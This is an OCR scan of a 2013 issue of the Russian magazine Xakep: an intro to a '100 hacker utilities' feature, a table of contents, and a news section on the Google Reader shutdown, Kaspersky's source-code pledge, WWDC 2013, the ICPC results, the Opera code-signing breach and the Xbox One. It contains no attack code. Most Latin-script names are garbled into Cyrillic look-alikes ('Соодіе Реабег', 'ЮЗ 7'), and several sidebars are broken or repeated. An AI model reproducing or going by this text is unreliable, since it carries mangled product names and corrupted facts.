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У каждого из нас есть джентльменский набор софта и серви- 
сов, которые мы используем. И конечно же, он есть у людей, 
которые профессионально занимаются информационной 
безопасностью. 

Когда мы задумывали сделать подборку лучших хакер- 
ских утилит, то видели единственно верный путь составить 
такую подборку — опросить известных ѵѵГіііе Гіаі’ов России 
о том, какими программами они пользуются. Было много 
обсуждений, какие утилиты включать, а какие нет. Разные 
варианты для описаний. Но в конце концов мы получили, 
возможно, первый текст, над которым работало так много 
людей из индустрии. 

Со страницы Іпіго хочу сказать спасибо тем людям, 
которые постоянно поддерживают журнал отличными мате- 
риалами и поучаствовали в коллективном написании статьи 
в этот раз: 

• Александр Матросов, ЕЗЕТ 

• Тарас Иващенко, Яндекс 

• Арсений Реутов, Розібѵе ТесГшоІодіез 
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Респект вам, ребята! 
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100 ПРОГРАММ 
ДЛЯ ХАКЕРА 

Лучшие зесигііу-утилиты, отобранные ѵѵбііе баі’ами России 
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АЛЕКСИС ОГАНЯН, 
СООСНОВАТЕЛЬ ИЕООІТ 



СТУДЕНТЫ ИТМО 
В ПЯТЫЙ РАЗ СТАЛИ 
ЧЕМПИОНАМИ 
МИРА ПО 

ПРОГРАММИРОВАНИЮ 



Все эксперты в Вашингтоне были уверены, что БОРА и РІРА пройдут. 
Расходитесь по домам, все уже решено. Но все изменилось от «неизбежного» 
до «немыслимого» всего за несколько месяцев. 
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Все новое за последний месяц 
Как прошел Ітадіпе Сир 2013 

Заверяем документы с помощью цепочки транзакций Віісоіп 
Лучшие зесигііу-утилиты, отобранные ѵѵЫіе Иаі’ами России 
Интервью с Алексисом Оганяном, сооснователем ВесШ 

Как редакторы ] [ и им сочувствующие пробовали софт и гаджеты для здорового образа жизни 

Допиливаем ѴѴіпсІоѵѵз 8 напильником, или ИапсІ-тасІе версия ѴѴіпсІоѵѵз 

Нагрузочное тестирование аз а зегѵісе 

Как делали компьютеры в СССР 

Детальный обзор ЮЗ 7 

Устанавливаем Ыпих-программы на смартфон под управлением АпбгоісІ 
Хакерские секреты простых вещей 
Анализ свеженькихуязвимостей 

Как система авторизации стала средством аутентификации и что из этого вышло 

Ошибки настройки РИЗ топовых веб-проектов 

Проактивная защита: обратное проникновение 

Опыт поиска уязвимостей в ВІаскВеггу 21 0 

Как перенести чужую игру с ХЬох 360 на РС 

Отчет из «диснейленда» для безопасников 

7 утилит для исследователей безопасности 

Живы ли старые способы? И куда мы будем копать в будущем? 

Большой обзор современной малвари, отжимающей деньги у пользователей 
Как я делал доверенную вычислительную среду на основе «гипердрайвера» 

Тогцие ЗР: опенсорсный движок для хардкорных игр 

Подборка интересных задач, которые дают на собеседованиях 

Рассказ о самых необычных и странных событиях, произошедших в мире Ореп Зоигсе 

Собираем звуковую станцию на базе І_іпих и МРР 

Обзор ІВМ Зесигііу Ыеіѵѵогк Іпігизіоп Ргеѵепііоп Зузіеш 

Унифицируем управление системами при помощи Випбеск 

Обзор дистрибутивов для организации МАЗ-сервера 

Новый роутер от Азиз с поддержкой 802.11 ас 

Вопросы и ответы 

8,5 Гб всякой всячины 

Удобные ѵѵеЬ-сервисы 
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ЖИЗНЬ ПОСЛЕ 
ООООЬЕ ПЕАОЕП 

ПРОШЕЛ МЕСЯЦ ПОСЛЕ ЗАКРЫТИЯ ЗНАМЕНИТОЙ ЧИТАЛКИ. ЧТО ТЕПЕРЬ? 




так, свершилось — в начале июля Соодіе прекрати- 
ла работу своей ПЗЗ-читалки Соодіе Реабег, невзи- 
рая на ее популярность и протесты со стороны ко- 
мьюнити. Официальное сообщение гласит: «Соодіе 
Реабег отключен. Мы хотим выразить благодар- 
ность всем, кто оставался с нами до конца. Мы по- 
нимаем, что не все согласятся с нашим решением, 
но мы уверены, что альтернативы вам понравятся 
не меньше, чем Реабег. С уважением, команда Соодіе Реабег». 

Все пользовательские данные о подписках будут доступны 
вплоть до 15 июля, чтобы люди имели возможность скопиро- 
вать их через Соодіе ТакеоиЬ После этой даты данные также 
будут удалены с серверов компании. Если кто-то не успеет 
озаботиться копированием — очень жаль, эта информация 
пропадет безвозвратно. 

Создатель Соодіе Реабег Крис Уэзерелл уволился из «кор- 
порации добра» еще в 2008 году и теперь признает, что если 
бы идея РЗЗ-читалки пришла ему в голову сегодня, он не стал 
бы развивать проект внутри компании. Увы, теперь говорить 
об этом уже все равно поздно. 



Петицию с требованием сохранить Соодіе 
Кеайег подписало более 150 тысяч человек 
Но к сожалению, это не помогло 



Закрытие Соодіе Реабег, конечно, наделало много 
шума и (к счастью) породило множество альтернатив. 
Многие читалки, к примеру йідд Реабег, вообще раз- 
местили у себя кнопку «Ітрогѣ Тгот Соодіе Реабег», 
чтобы облегчить процесс миграции для пользовате- 
лей. На какие альтернативы стоит обратить внимание? 

Создатели Реебіу, странноватого альтернативного 
веб-интерфейса для Соодіе Реабег, еще весной, ког- 
да прошла первая волна информации о закрытии, по- 
обещали написать собственный бэкенд — и написа- 
ли. Правда, после отключения Соодіе-читалки Реебіу 
скоропостижно «легла», не выдержав чудовищной на- 
грузки. Сейчас дела понемногу налаживаются. 

Кроме Реебіу, стоит посмотреть на Іпогеабег 
и С2Реабег. У первой читалки есть РРА-версия, 
что для многих может оказаться решающим аргу- 
ментом. Свой клон запустила и компания Веіаѵѵогкз, 
которой ныне принадлежит Оідд. Пользоваться этим 
продуктом сложновато — на момент написания этой 
новости в йідд РІеабег невозможно было даже нор- 
мально задать сортировку. 

Еще одна компания, ре- 
шившаяся создать клон, — ле- 
гендарный АОІ_. Но АОІ_ РІеабег 
работает лишь в стадии закры- 
той беты, записаться можно 
здесь: геабег.аоі.сот . 




Забавный факт: бот 
РеесНеІсНег-ОоодІе 
до сих пор заходит 
на сайты в поисках 
В88-лент. Одинокий, 
потерянный зомби. 
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КАСПЕРСКИЙ 

ОТКРОЕТ 

ИСХОДНИКИ 

ВЫХОД НА НОВЫЕ РЫНКИ МОЖЕТ 
ПОТРЕБОВАТЬ ЖЕРТВ 

Ч тобы завоевать зарубежные рынки, порой приходится 
идти на уступки. Так, на Западе вопрос доверия к за- 
рубежному ПО и железу в последнее время встает 
все острее. Яркий тому пример: власти США счита- 
ют, что оборудование компании Ниаѵѵеі ТесЬпоІодіез, 
которое устанавливают американские операторы, используется 
Китаем для шпионажа, и фактически его бойкотируют. Антивирус- 
ные решения от российской компании, очевидно, тоже вызывают 
в других странах немало вопросов, так как Евгений Касперский 
недавно заявил, что «Лаборатория Касперского» в ближайшем 
будущем раскроет исходный код своих продуктов. Касперский 
на примере пояснил, что, скорее всего, продукция компании 
Ниаѵѵеі содержит некие скрытые функции, но это не бэкдоры, 
а нечто среднее. Словом, проблема в том, что это скрытые функ- 
ции, отсюда возникает недоверие. Хотя Евгений Касперский 
не стал вдаваться в политические аспекты проблемы, он признал, 
что и «Лаборатория Касперского» может пасть жертвой подобно- 
го недоверия в США, Западной Европе и Австралии. Компания 
как раз выходит на рынок Штатов и планирует использовать мест- 
ные серверы для компиляции кода и резервного хранения данных. 
Касперский заявил: если возникнет надобность, американцы по- 
лучат доступ к исходному коду и компания докажет, что в ее про- 
дуктах и технологиях «нет ничего потайного». 

Напомним: в мае этого 
года стало известно, 
что «Лаборатория Ка- 
сперского» собирается 
открыть представи- 
тельство в Вашингтоне. 
И продавать свою 
продукцию компания 
планирует ни много ни 
мало американскому 
правительству. 




О ЧЕМ СПЕЦСЛУЖБЫ 
СПРАШИВАЮТ ІТ-ГИГАНТОВ 

СРАЗУ РЯД КОМПАНИЙ РАСКРЫЛИ ДАННЫЕ 
О ЗАПРОСАХ СПЕЦСЛУЖБ ЗА ПРОШЕДШИЙ ГОД 

Л юбопытную статистику огласили сразу несколько крупных игроков 
ІТ-рынка, предварительно получив одобрение от правоохрани- 
тельных органов. Первой выступила компания РасеЬоок, расска- 
зав, чем и сколько раз интересовались спецслужбы в конце про- 
шлого года. Статистика такова: социальная сеть получила порядка 
10 тысяч запросов от разных ведомств, касающихся 18-19 тысяч аккаунтов. 
В свою очередь, компания МісгозоТІ: сообщила, что за тот же период получила 
от полиции и служб безопасности 6-7 тысяч ордеров и запросов, касавших- 
ся 31-32 тысяч аккаунтов. Вскоре последовала статистика и от ѴаЬоо!: спец- 
службы США интересовались частными данными пользователей 12-13 тысяч 
раз. «В основном речь в этих запросах шла о мошенничестве, убийствах, по- 
хищениях и прочих уголовных расследованиях», — пояснили представители 
компании. 

В это же время издание ТЬе ѴѴазЬіпдТоп РозТ написало, что АН Б и ФБР 
имеют прямой доступ к серверам перечисленных компаний и могут сами до- 
стать любую интересующую их информацию. 

В РасеЬоок и МісгозоТІ: эту информацию, разумеется, опровергли. 





— > 57% компаний не применяют 
никаких средств для контроля 

ПО, а еще 56% не следят за под- 
ключением внешних устройств, 
подсчитала «Лаборатория Каспер- 
ского». 



— > ЫпкесІІп ввел двухфактор- 
ную аутентификацию. Напомню, 
в прошлом году ЫпкесІІп уже до- 
пустил утечку данных 6,5 миллиона 
пользователей и явно не желает 
повторения. 



— > Создатели сІоиЫеТѵѵізі пред- 
ставили МадісРІау, открытый 
аналог АігРІау. Есть надежда, что 
технология станет новым стандар- 
том для беспроводной передачи 
звука. 



— > Новым лидером в области 
распространения спама являет- 
ся Белоруссия, сейчас генери- 
рующая 16,3% мирового спам- 
трафика. Таковы данные компании 
Арргіѵег. 
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МЕСАЫЕѴѴЗ 



ДВЕ НЕОБЫЧНЫЕ 
ФЛЕШКИ 

ФЛЕШКА С ЫРС-ЗАЩИТОЙ И ѴРЫ-ТОННЕЛ Ь 
С ПОМОЩЬЮ ДВУХ ФЛЕШЕК 



С разу два необычных мини-гаджета принес 
нам прошедший месяц. Сначала компа- 
ния РОІ продемонстрировала, что у ІМРС- 
технологии есть и не совсем очевидные при- 
менения. РОІ оснастили поддержкой І\ІРС 
обычные флеш-накопители, превратив это в дополни- 
тельную защиту. Данные на флешке шифруются на аппа- 
ратном уровне, и, чтобы получить доступ к ним, понадо- 
бится другое устройство с поддержкой ІМРС, работающее 
под управлением АпсІгоісІ. ІЧРС дает возможность управ- 
лять работой накопителя: можно включить полный до- 
ступ, доступ только для чтения, однократный доступ и так 
далее. Флешки будут выпущены емкостью от 8 до 64 Гб. 
Продажи стартуют в конце года. 

Устройство от компании ІТѵѵіп еще любопытнее. ІТѵѵіп 
Соппесі позволяет установить ѴРІ\І -туннель между двумя 
компьютерами при помощи флешки, состоящей из двух 
частей. Как нетрудно понять, одна часть флешки подсо- 
единяется к первому компьютеру, вторая — ко второму. 
Все данные между ними шифруются по протоколу АЕ5- 
256. Вариант, конечно, не для продвинутых пользовате- 
лей, но для обывателей — очень удобно. 




Интерес к необычным 
флешкам не ослабева- 
ет: весной этого года 
проект туісікеу собрал 
на Кіскзіагіег почти 
пол миллиона долл аров 
вместо необходимых 
150 тысяч. Суть раз- 
работки проста, как все 
гениальное: флешка 
для хранения паролей 
и ключей, с биоме- 
трической защитой 
данных, оснащенная 
сканером отпечатков 
пальцев и распознаю- 
щая голос владельца. 





— > Арріе открыла фирменный 
интернет-магазин в России. 

Цены такие же, как в розницу, 
или выше, но вот возможность 
заказать кастомную конфигурацию 
макбука — бесценна. 




— > Новый лидер топа-500 
самых мощных суперкомпьюте- 
ров — китайская система ТіапНе-2 
(«Млечный путь — 2»), Ее произ- 
водительность составляет 33,86 
петафлопс. 




292 % 



«1984» ПОПУЛЯРЕН 
КАК НИ КО ГД А 

— > Удивительный рост продаж проде- 
монстрировал роман Джорджа Оруэлла 
«1984». Книга была написана 64 года 
назад, и в ней описывалось тотали- 
тарное общество с полным контролем 
над информацией и личным простран- 
ством людей. Сегодня она как никогда 
актуальна. В начале июня «1984» вышел 
в лидеры продаж на Атаіоп. 




ССЫЛОК ПОПАЛИ 
В РЕЕСТР ЗАПРЕ- 
ЩЕННЫХ САЙТОВ 

«Лига безопасного интернета» поде- 
лилась данными, полученными от Роском- 
надзора. За семь месяцев существования 
проекта в единый реестр запрещенных 
сайтов угодило больше семи с половиной 
тысяч ссылок на различные страницы. 
Также сообщается, что всего за это время 
поступило 46 800 жалоб на различные 
ресурсы. 



У 
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«ЯБЛОЧНЫЕ» ОБНОВЛЕНИЯ 

10$ 7, 03 X 1 0.9 И НЕТОЛЬКО 



есяц выдался богатым на новинки от компании Арріе, и на этот раз новости 
касаются не только железа, но и софта, о котором поговорим вначале. 

На Ѵ\МЮ С 2013 Арріе представила ОЗ X 10.9, официальное название ко- 
торой Маѵегіскз. Яблочная корпорация решила отойти от практики исполь- 
зования «животных» названий для версий своих ОС. ОЗ X 10.9 получила имя 
Маѵегіскз, в честь популярного среди серферов побережья в Северной Калифорнии. Из- 
менений в новой версии немало, вот наиболее интересные из них: 

• появились теги для папок, файлов и документов; 

• улучшена работа ЗаѵаЗсгірі-движка, так что новая версия ЗаТагі стала еще быстрее; 

• запущен сервис іСІоисІ Кеусііаіп, который хранит пароли, логины и номера кредитных 
карт в облаке с шифрованием; 

• традиционно поработали над производительностью, а также уменьшили потребление 
энергии и памяти. Ресурсы расходуются только на те окна, которые видны на экране. 

Система выйдет в продажу этой осенью. 

На той же конференции Ѵ\МЮ С была 
представлена и ЮЗ 7. Основное изме- 
нение заметно сразу — был переработан 
интерфейс. Иконки приложений стали 
плоскими, в ОС задействован новый 
шрифт, новые обои, а также переработа- 
ны штатные программы (календарь, по- 
года, почта и так далее). Основной экран 
ЮЗ научился реагировать на наклоны ап- 
парата и отображает соответствующую 
анимацию, а на заблокированном экране 
теперь возможно выводить уведомле- 
ния. Также Арріе улучшила технологию 
многозадачности. Теперь система отсле- 
живает, какие приложения используются 
реже, а какие — чаще, и соответствую- 
щим образом расставляет приоритеты. 
Еще одна приятная новость — на устрой- 
ствах с ЮЗ на борту появилась поддерж- 
ка Аігйгор — технологии беспроводного 
обмена файлами по сети ѴѴі-Рі. Пользоваться ей смогут владельцы іРНопе 5, іРасІ четвер- 
того поколения, ІРасІ тіпі и іРосІ іоисіі пятого поколения. Зігі получил новые голоса и стал 
«умнее». ЮЗ 7 также будет доступна этой осенью. 

Но помимо софта, Арріе показала и кое-что интересное из железа. Мае Рго кардинально 
сменил дизайн. Теперь это цилиндр, закрытый черной глянцевой панелью, вид которого 
навевает мысли то ли о Н202, то ли о шлеме Дарта Вейдера. В панели имеются прорези 
в области интерфейсных разъемов. В числе последних — четыре ІІЗВ, два Ри-45, НйМІ 1 .4 
и сразу шесть портов Ыдіііпіпд 2.0. Известно, что новый Мае Рго будет оснащен 12-ядерным 
процессором Іпіеі Хеоп Е5, оперативной памятью ййРІЗ 1866 МГц, беспроводными адапте- 
рами ѴѴі-Рі 802. 11 ас и ВІиеіооІЛ 4.0, а также двумя Зй-картами АМй РігеРго, обеспечиваю- 
щими поддержку разрешения 4К (Шга НО). Цена новинки пока неизвестна. 



Новые Аіг исполь- 
зуют процессоры 
НашеП. Это увели- 
чило время их ав- 
тономной работы; 
в 11-дюймовой моде- 
ли— с 5 до 9 часов, 
в модели с экраном 
диагональю 13,3 дюй- 
ма— с 7 до 12 





Мае Рго кардинально 
сменил дизайн. Теперь 
это цилиндр, закрытый 
черной глянцевой 
панелью, вид которого 
навевает мысли о Р2Р2. 





2ЕЫЗ ПО-ПРЕЖНЕМУ 
ОПАСЕН 

— > По данным компании Езеі, банковские троянцы 
семейства 2еиз отнюдь не забыты и до сих пор пред- 
ставляют ощутимую угрозу. Согласно отчету, в мае 
семейство 2Воі опять показало рост активности и до- 
стигло уровня распространенности 4,83%, что совсем 
не мало. 




СЛЕДИМ ЗА ВАМИ ЧЕРЕЗ 
РЕАЗН. ОПЯТЬ 

— > Все помнят уязвимость в АбоЬе РІазТі, что позволя- 
ла получить доступ к веб-камере без ведома юзера? 
Баг появился вновь и опять позволяет делать снимки 
с веб-камеры. Чтобы дать доступ к камере, жертве 
нужно нажать на элемент в флешке, поверх которого 
наложена специальная прозрачная панель. 




«КОНТРА» БЕССМЕРТНА. 
ТЕПЕРЬ ДЛЯ 103 

— > Все, чье детство прошло в девяностые, хорошо 
помнят культовую серию игр Сопіга от японской ком- 
пании Копаті; длинный Копаті-код, ставший нари- 
цательным и дающий игроку тридцать жизней вместо 
трех... Появился хороший повод вернуться в дет- 
ство — Копаті выпустила Сопіга: Еѵоіиііоп для іОЗ! 





МЕСАЫЕѴѴ5 
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КОМАНДА ИТМО 
ПОБЕДИЛА В ІСРС 

САНКТ-ПЕТЕРБУРЖЦЫ В ПЯТЫЙ РАЗ СТАЛИ ЧЕМПИОНАМИ В МЕЖДУНАРОДНОЙ 
СТУДЕНЧЕСКОЙ ОЛИМПИАДЕ ПО ПРОГРАММИРОВАНИЮ 



В 27-м по счету финале АСМ ІСРС приняло участие 120 команд из 36 стран мира. 

Таким образом, до итогового состязания было допущено 360 студентов из 
300 тысяч, участвовавших в отборных региональных этапах олимпиады. По ус- 
ловиям финального конкурса командам было предложено решить 11 задач за 
пять часов. При подсчете очков учитывается скорость решения задач, а также 
количество попыток (за каждое неверное решение назначается пенальти). Из 11 задач не 
решена была только одна. Рекорд скорости решения одной задачи принадлежит команде 
Национального университета Тайваня — ребята ухитрились верно решить одну из задач 
через десять минут после начала состязания. Как отмечают организаторы, за это время 
сложно было успеть даже прочитать все условия задач. 

Принимающей стороной выступала команда Санкт-Петербургского университета ин- 
формационных технологий, механики и оптики (ИТМО). В прошлом эта команда уже четыре 
раза занимала первое место в ІСРС, что является рекордом, поэтому еще до начала состя- 
зания ребята по праву считались фаворитами. ИТМО не подвел и в этом году, заняв первое 
место. Команде единственной удалось решить десять задач. При этом нужно отметить, что 
по правилам соревнования каждый студент имеет право участвовать в финале ІСРС только 
два раза в жизни. Поскольку состав команд постоянно меняется, своим успехом ИТМО обя- 
зан как студентам, так и тренеру команды Андрею Станкевичу, работающему с командой 
университета с 2001 года. 

Призовые места в олимпиаде заняли 13 университетов, было выдано четыре золотые 
медали, четыре серебряные и пять бронзовых. Золотые медали получили студенты Шан- 
хайского университета Цзяо Тонг, Токийского университета, Национального университета 
Тайваня. Команде СПбГУ присудили серебряную медаль (5-е место), Киевскому нацио- 
нальному университету имени Тараса Шевченко — серебряную медаль (7-е место), Бе- 
лорусскому государственному университету — серебряную медаль (8-е место), МГУ — 
бронзовую медаль (10-е место), Пермскому государственному университету — бронзовую 
медаль (13-е место). 

На официальных сайтах олимпиады можно ознакомиться с полными результатами со- 
стязания ( юо.аІ/с27ѵК ). а также с условиями задач ( юо.аІ/І2Ь5Х ). 
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Россия впервые приняла у себя ІСРС. В следующем году олимпиада также пройдет у нас — 
на этот раз в Екатеринбурге. 



оі 




ОтроГ 

ОНИРАЕ.ОПО ВЗЛОМАЛИ 



— > Хакеры добрались до бгираі.огд — официального 
сайта популярной СМ3. К сожалению, злоумышлен- 
никам удалось скомпрометировать имена пользо- 
вателей, етаіі’ы, информацию о стране проживания 
и даже защищенные пароли. После инцидента адми- 
нистрация «обнулила» почти полмиллиона человек. 




БЫВШИЙ ГЛАВАРАБМ 
СОЖ АЛ ЕЕТ О СД Е Л КЕ С Н Р 

— > Три года назад компанию Раіт продали Неѵѵіей- 
РаскагсІ за 1 ,2 миллиарда долларов. Ничего хорошего 
из этого, увы, не вышло. Теперь экс-гендиректор 
Раіт Джон Рубинштейн признал: «Если бы у нас была 
возможность вернуть все назад, я не дал бы согласия 
на сделку. Мы упустили компанию». 




ПРОГРАММА 

ВОЗНАГРАЖДЕНИЙ 

ОТМІСРОЗОГТ 

— > Платить деньги за уязвимости давно начали 
многие игроки рынка, и теперь их ряды пополнила 
компания МісгозоТІ:. Отныне ВидВоипіу работает 
на постоянной основе, а не только в рамках различных 
конференций и конкурсов. Максимальное вознаграж- 
дение за баг — 100 тысяч долларов. 
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ВЕ8ТАРТ 
РПСУЕСТ — 
ПОЧИНИМ ВСЁ 

ИНТЕРЕСНОЕ ДВИЖЕНИЕ ЗАРОДИЛОСЬ У НАШИХ 
ЕВРОПЕЙСКИХ СОСЕДЕЙ 



В детстве некоторые из нас посещали клубы/кружки ра- 
диолюбителей, теперь стало модно и удобно ходить 
вхакспейсы. Но движение, зародившееся год назад в Ве- 
ликобритании, похоже, объединяет в себе все это вместе 
взятое, только с примесью экодвижения. 

Везіагі: Ргоіесі: ( ІНегезІагіргоіесі.ога ). или, говоря по-русски, 
«Проект перезагрузка», представляет собой своеобразный клуб 
бесплатных ремонтников, руководствующихся Благородной Целью. 
Основные идеи движения: починка любой техники (бесплатно), эко- 
номия денег, получение удовольствия и морального удовлетворе- 
ния от ремонта вещей, а также борьба с маркетинговыми уловками 
корпораций, постоянно навязывающих покупателям новые и новые 
гаджеты, порой намеренно встраивая в них хрупкие или деградиру- 
ющие компоненты. 

Простая идея чинить сломанное и помогать в этом ближним на- 
столько понравилась британцам, что на каждую «гез1:аг1:-вечеринку» 
приходит все больше людей, принося с собой ноутбуки, смарт- 
фоны, ОѴО-плееры, принтеры и другую электронику. Число до- 
бровольных ремонтников уже превысило 58 человек, а уж счет их 
клиентов и вовсе пошел на сотни. Оказалось, что починка техни- 
ки — это неплохой способ провести досуг и повод познакомиться 
с интересными людьми. 










В Лондоне уже со- 
стоялось 27 «гезіаіі- 
вечеринок», входе 
которых отремон- 
тировали порядка 
393 килограммов 
электроники. 




РОЗЕТКИ НЕ НУЖНЫ 

МОБИЛЬНЫЕ АККУМУЛЯТОРЫ НІРЕН МОВНЕРОѴѴЕВ 



В наш век цифровых технологий и сенсорных экранов, когда устрой- 
ства с трудом способны продержаться от одного заряда хотя бы 
сутки, как никогда остро стоит вопрос их подзарядки. Компания 
НІРЕР! представляет отличное решение этой проблемы для лю- 
бого гаджетомана — серию мобильных аккумуляторов тоЬіІеРоѵѵег емко- 
стью от 2500 мА • ч до 15 000 мА • ч. НІРЕР плоЬіІеРоѵѵег способен выручить 
пользователя в любой момент, подзарядив цифровое устройство через 
один из ІІЗВ-портов с током 1,0 А или 2,1 А. Каждая модель снабжена четы- 
рехуровневым индикатором, функциональным І_ЕО-фонариком и кардриде- 
ром для ЗР-карточек. 

Самая емкая модель — МР15000 станет отличным выбором для длитель- 
ных поездок и путешествий. Для мобильных применений НІРЕР предлагает 
модели с меньшей емкостью, например МР5000, обладающий более скром- 
ным весом и габаритами, так что аккумулятор легко поместится в любую 
сумку и не будет обременять пользователя. В комплект поставки также вклю- 
чены самые разные переходники, чтобы вопрос зарядки любого устройства 
на ходу не был проблемой, даже если под рукой не оказалось стандартного 
кабеля. Стоимость моделей варьируется от 23 до 47 долларов, в зависимости 
от емкости. 




человек «потеряла» компания 
РасеЬоок. Социальная сеть при- 
зналась в утечке етаіі-адресов 
и телефонов своих пользователей 
из-за бага. 




— > Журналисты ВВС выясни- 
ли — оснащенный веб-камерой 
компьютер женщины, заражен- 
ный малварью, ценится в 100 раз 
дороже (1 доллар), чем компьютер 
мужчины (0,01 доллара). 




— > Вышел в свет релиз 
Сгуріосаі 2.1 . У мессенджера 
появился новый графический 
интерфейс, а также реализована 
передача зашифрованных файлов 
в общий чат. 



— > Брюс Шнайер, известный 
эксперт в сфере ИБ и крип- 
тограф, вошел в состав совета 
директоров Фонда электрон- 
ных рубежей (Еіесітопіс Ргопйег 
Боипсіаіюп, ЕРР). 
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МЕСАЫЕѴѴЗ 



0РЕВА30РТѴѴАРЕ 

ВЗЛОМАЛИ 

ХАКЕРЫ УКРАЛИ СЕРТИФИКАТ 



В конце июня компания Орега ЗоТіѵѵаге, чей браузер 
по-прежнему весьма популярен на территории Рос- 
сии и стран СНГ, сообщила о факте взлома. Атака 
на внутреннюю сеть компании явно не была слу- 
чайной, и злоумышленники знали, что делают. К со- 
жалению, Орега постигла та же участь, что компанию АсІоЬе 
в прошлом году, — хакеры сумели заполучить «как минимум 
один старый и просроченный сертификат Орега для подписи 
кода». Теперь взломщики могут распространять вредоносные 
программы за подписью Орега ЗоТіѵѵаге, что они и поспешили 
сделать. Малварь поместили в автообновление браузера. Раз- 
работчики предупреждают, что пользователи браузера Орега 
под ѴѴіпбоѵѵз могли автоматически скачать и установить вре- 
доносный софт 19 июня между 01:00 и 01:36 ІІТС. Проблема 
точно коснулась нескольких тысяч человек по всему миру (что 
в общем масштабе, к счастью, не так много). Орега рекомендует 
обновить браузер и приносит извинения. Сейчас серверы уже 
очищены от вредоносных программ, начато расследование. 




Оказывается , у пере- 
хода Орега на движок 
Соодіе ВІіпкесть 
плюсы. К примеру, 
теперь в Орега легко 
устанавливаются боль- 
шинство расширений 
для Соодіе СПготе. 





— > На базе СРІІ ІЧѴісІіа ученые 
Стэнфордского университе- 
та создали крупнейшую в мире 
нейронную сеть. Шестнадцать 
серверов с СРІІ образовали сеть 
с 11,2 миллиарда параметров. 



Щ 

аііаѵізіа 

Ё Ё А Я С Н 80ЕТШАВЕ 



— > Некогда популярнейшая 
поисковая система АІіаѴізіа, 

принадлежащая теперь компании 
ѴаІіоо!, официально прекратила 
свою работу 8 июля 2013 года. 







ЗАПРОСОВ 
В СУТКИ ДОСТИГ 
ОІІСКОІІСКСО 

— > Мы уже писали о поисковике 
ОискОискСо — интересной альтернативе 
Соодіе, Віпд и другим популярным маши- 
нам. В РОС нет рекламы, зато есть полная 
анонимность и много полезных фишек. 
Рады сообщить, что популярность йРС 
растет — три миллиона запросов в сутки 
против сотни тысяч запросов в день еще 
пару лет назад. 




4 %® 



ПЛАГИНОВ 
КѴѴОРЮРНЕЗЗ 
ИМЕЮТ ДЫРКИ 

Недавно в компании 
СНесктагх провели экс- 
перимент — взяли 50 самых 
популярных плагинов для 
ѴѴогсІРгезз и поискали в них 
недочеты. Оказалось, что 12 
из 50 уязвимы даже к самым 
примитивным атакам, вроде 
ЗОЕ-инъекций иХЗЗ. Компа- 
ния сообщает, что суммарно 
уязвимые плагины были 
загружены более восьми 
миллионов раз. 
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ХВОХОЫЕ — ВСЕ 
БУДЕТ СОВСЕМ НЕ ТАК 

НОВЫЕ ПОДРОБНОСТИ О ГРЯДУЩЕЙ КОНСОЛИ 

А нонс новой консоли от МісгозоТІ: оказался весьма странным, о чем мы уже рас- 
сказывали тебе недавно. Жесткие ограничения на б/у игры, постоянное под- 
ключение к сети в принудительном порядке, ориентированность скорее на те- 
левидение, нежели на игровую составляющую. Все это вызвало недоумение 
и много вопросов. Похоже, ропот аудитории был услышан, и МісгозоТТ спешно 
вносит коррективы в свои планы. 

На официальном сайте компании спустя почти месяц после анонса ХЬох Опе появи- 
лись новые подробности о приставке, часть из которых прямо противоречит рассказан- 
ному ранее на презентации. Нет, пугаться не стоит, новости в большинстве своем, напро- 
тив, хорошие. 

Первое, от чего хочется выдохнуть 
с облегчением, — сняты ограничения 
с распространения б/у игр. Напомню, из- 
начально планировалось следующее: дать 
пользователю возможность играть в игры 
вне зависимости от того, как они были 
приобретены (загружены или куплены 
на диске), но только после авторизации 
в своем аккаунте на ХЬох І_іѵе. В этом свете 
ХЬох Опе должна была иметь возможность 
по крайней мере раз в сутки подключаться 
к центральным серверам МісгозоТТ. Если 
консоль не имела возможности сделать 
это, то доступ к играм должен был блоки- 
роваться. К счастью, в МісгозоТТ передума- 
ли. Владельцы ХЬох Опе все-таки смогут 
меняться играми, перепродавать их и покупать с рук диски. Необходимость раз в день 
подключаться к сети и региональную блокировку также отменили. Таким образом, обме- 
ниваться не получится разве что играми, купленными в Сети (их невозможно запустить 
на другом экземпляре консоли). 

Однако у консоли остается немало других проблем. Одна из них — ситуация, скла- 
дывающаяся вокруг инди-игр для ХЬох. Ситуация с инди абсурдна. В то время как Зопу 
и ІМіпТепсІо всячески поддерживают независимых разработчиков, позволяя им публико- 
вать игры самим, непосредственно через РЗЫ и еЗЬор, МісгозоТІ: упирается как только 
может. Создается впечатление, что инди-девелоперы как-то особенно ненавистны софт- 
верному гиганту. ХЬох 360 не давала возможности разработчикам публиковать свои 
игры самостоятельно, от них требовалось найти издателя или подписать контракт с М3, 
что на корню убивает всю идею «инди» как таковую. Непохоже, что ситуация изменится 
с ХЬох Опе, во всяком случае до сих пор никаких заявлений на этот счет не поступало. 
Увы, но любителям инди лучше обратить внимание на Р34, которая, к слову, мощнее 
и при этом дешевле на сотню долларов. 



Мхсгозо^і отмени- 
ла плату за выпуск 
патчей и обнов- 
лений к играм для 
ХЬох 360, которая 
наносила немалый 
урон инди-разра- 
ботке 




ІМООООЬЕѴѴЕТВиЗТ 



— > Опрос, проведенный среди читателей ѴѴазЬіпдТоп 
РозТ и АВС Ыеѵѵз, принес неожиданный результат. 
Оказалось, что 83% граждан «благосклонно» смотрят 
на деятельность компании Соодіе. В то же время 
уровень симпатий публики к Арріе составил 72%, 
а к РасеЬоок — и вовсе лишь 60%. 
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ОЬУА ПОШЛА В НАРОД 

— Крохотная игровая консоль Оиуа, базирующаяся 
на АпсІгоісІ, поступила в продажу в конце июня. Напом- 
ню, проект собрал на Кіскз1:аг1:ег рекордные 8,5 мил- 
лиона долларов, и, как показали продажи, интерес 
к консоли за время разработки не ослабел — гаджет 
раскупили за несколько часов. 




Удивительное дело: Дон Меттрик, президент подразделения МісгозоТІ по интерактивным 
развлечениям (именно оно занимается ХЬох и другими игровыми разработками), покидает 
компанию. О своем уходе в компанию 2упда Меттрик сообщил вскоре после презентации ХЬох 
Опе, что наводит на нехорошие размышления. 




НА 614% 

БОЛЬШЕ ВИРУСОВ 

— > Пугающую статистику обнародовала компания 
Зипірег ЫеТѵѵогкз: за последний год количество вредо- 
носного ПО для АпсІгоісІ увеличилось на 614%! В про- 
шлом году рост составлял лишь 155%. 73% вредонос- 
ных приложений используют уязвимости для отправки 
ЗМ8 на платные номера. 





НеасГег 



ХАКЕР 08 /175/ 2013 



іг 




КАК ПРОШЕЛ 
ІМАСІЫЕ СУР 2013 



СТУДЕНТЫ ДЕЛАЮТ! 

Увидев меня в тельняшке с надписью Ітадіпе 
Сир, друг заметил: «О, круто! Всегда хотел в нем 
